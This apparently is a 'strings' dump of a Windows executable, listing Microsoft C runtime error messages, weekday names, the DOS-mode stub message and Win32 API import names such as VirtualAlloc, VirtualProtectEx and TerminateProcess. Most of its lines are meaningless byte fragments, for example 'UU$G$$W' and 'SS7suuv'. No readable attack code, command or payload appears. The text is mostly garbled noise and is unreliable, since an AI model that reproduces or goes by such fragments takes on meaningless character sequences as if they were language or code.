SetUnhandledExceptionFilter
$)$S(GSuuT
SING error
SjjJSS
$SM$$$	
\SMMP1
SMM?SS
SS&4SUEU
SS7suuv
SS=$$F
SS(i$$
SSjP	j
SS$<.L$
SSl;SMMF
SS-luu
SSluu/
$SS;MM.@!
S\SMUMB
SSNSSM	
SSnUGG]0U
SS<?$P $
 SSqv$$
SSrUUU
^SSSSS
SS.u$$
SS$uQ$$
S:S$u$S
SS('UU$O$
SSY$$lS:
 stPro
StSuuu
Sunday
SunMonTueWedThuFriSat
S$"UU	
suu]SS
S$X$$$$
SY8F9e
'$SZASG5
SZfSUb,U$$
SZXS$$
t$0VhX
T$$8GG
t^9(uZ
$t/Axp$
taZP@	
tD9(u@
TerminateProcess
[tGGTH%jj
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
`=$t$j
.t$$(jj
tjRjGY
t%$$Kp$$<
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tLxwk_]j
TN8$${
@??@to
tpVjMS
Tuesday
Tuuao$$
;t$,v-
tV=,Lt
t+WWVPV
u$)*$$
U0.UUp
U$$4mJ
*u4wmw
$&^$U5
U7?5Uu
U7UM'(M
U7Uuu\
U\$$cz
udemEt 
Ud)UMM
uDzu$2
UEKU/UU
UepUMn
U_f>?s
UGA5G$$
Ujj/UU
U$$l}A
Ul-dUU
$$Ul\U
Ul_.UU
/=U$+$M
uMFM$$
UMKMSf
UM<UMMO
UmyUUn-U
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
_unOAlto
upKnu$$X
$$U=pU
U|PUMM
UQPXY]Y[
.uquSS
UQU$T$
U(Rich:
urMMG=G
URPQQhx
USER32.DLL
U$S>nS
<USS?uu
U'=U$$
UU@<2U
_UU4MM
uu5uujNQ
UU9UU(
^UU$)a$
uuA@bMMw
U`	U$$Cv
uudUUU
"UUG"AG
$UU~GGm
UU$G$$W
|uuhuUP
UUIErU
U?UjjAuu
uu@jj`Q
UU|jqj
UUJU$$
~UUJuGS^6
uuKSuu
[$U`|UMM
&uuMPw
uuN%SS.
UU/o$$
UU<O$$
uupGGiH
uuPGUU
%UU<Q{I
UUQMMW
uuqSS#
UUQUU;<
.$UU$s
UU+sCA	g
<?UUS?S$
uu@SSU\
UUTrjj
*uUU_!
*Uuu,$$
$$}UUU
uUU8$$
uuu$Dy$$$A$$
uuUhU$
UUUK>U
u	uum$
UUUQtSS
uUUSSS
U#UUtU
UU<<uu$
UU\(UU
uu$)UU\H
UU#UUM
Uuu,uMM
UU~UUT
~UUVSS
u\u$$z
uV?HPP_h
$$U yz
V~$$1{D
VirtualAlloc
VirtualFree
VirtualProtect
VirtualProtectEx
v	N+D$
V$`$UBU
vuNbuu
VUUISS
W1MM\MM)
Wa$$)$
wDaFfR
Wednesday
WideCharToMultiByte
Wk7$$O
WriteConsoleA
WriteConsoleW
WriteFile
wuMP"M
W=uu=n
-wUUUm
$$	x$$
x$$5$S
x=AV^@
-xGdG$
}Xjjai
XjjU'FUSA
xM$#$B
@XMM/u]
x;MU2U$@$
xMxW;W
$xn$$$;
xppwpp
xpxxxx
xQ$$j.j
^@XSSX
x]U.e9
xuu3YF
+$$y$$
Y`Fujx
<YGjjM$$S
yMMp$$
>=Yt/j
YYu-9D$
YYuTVWh
YzuIuu
ZA<=+M
$$z^>$$g
!z^=jjI
ZJPGuu
	ZLMM~
$$ZpMM
zq?$$^
zuuSNOS
z$$W$$